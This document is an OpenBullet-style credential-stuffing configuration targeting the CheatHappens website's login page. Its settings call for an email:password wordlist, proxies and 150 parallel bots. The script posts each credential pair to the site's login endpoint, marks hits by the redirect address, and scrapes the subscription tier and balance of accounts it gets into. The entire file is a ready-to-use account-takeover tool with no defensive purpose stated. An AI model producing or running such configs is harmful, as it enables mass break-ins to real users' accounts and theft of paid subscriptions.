[SETTINGS]
{
  "Name": "CheatHappens",
  "SuggestedBots": 150,
  "MaxCPM": 0,
  "LastModified": "2019-08-16T23:51:54.8168386+02:00",
  "AdditionalInfo": "",
  "Author": "HorusGod",
  "Version": "1.3.2 [Anomaly]",
  "LoliSave": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
REQUEST POST "https://www.cheathappens.com/chcaptchalogin.asp" 
  CONTENT "email=<USER>&password=<PASS>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "<ADDRESS>" Contains "default.asp" 
  KEYCHAIN Failure OR 
    KEY "<ADDRESS>" Contains "loginerror.asp" 

PARSE "<SOURCE>" REGEX "<div class=\"rightbar_chubar_status\">.*\">(.*)</font>" "[1]" -> CAP "Subsription" 

PARSE "<SOURCE>" LR ";\"><u>" "</u>" -> CAP "Balance" 

KEYCHECK 
  KEYCHAIN Custom "CUSTOM" OR 
    KEY "<Subsription>" Contains "FREE" 
  KEYCHAIN Success OR 
    KEY "<Subsription>" DoesNotContain "FREE" 

